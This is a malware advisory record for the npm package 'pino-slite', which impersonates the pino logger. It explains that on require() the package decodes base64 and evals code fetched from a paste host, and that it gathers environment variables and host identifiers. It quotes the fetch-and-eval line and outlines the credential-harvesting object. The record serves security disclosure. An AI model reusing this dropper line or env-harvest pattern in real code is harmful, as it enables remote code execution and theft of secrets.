MAL-2026-6078

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb) pino-slite impersonates the legitimate `pino` logger (README titled 'pino-slite (Pino)' with badges and homepage pointing to getpino.io, exported function named `pino`). On require(), lib/writer.js (loaded transitively from the package main pino.js) decodes a base64 string and passes it to eval(atob(hash)). The decoded payload performs `fetch('https://jsonkeeper.com/b/0DWFC').then(r=>r.json()).then(d=>{eval(d.ret);})`, executing attacker-controlled JavaScript fetched from a mutable third-party paste host on every load. Immediately before the eval, the module assembles a `data` object containing `{...process.env, version, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddresses: <non-internal IPv4 MACs>}`, which is in scope for the remotely-fetched code — providing a ready-made channel to exfiltrate the installer's full environment (CI secrets, AWS_*, NPM_TOKEN, GH tokens, etc.) and host identifiers. This combines a typosquat lure, an import-time RCE dropper from an attacker-controlled mutable URL, and an environment-credential harvester.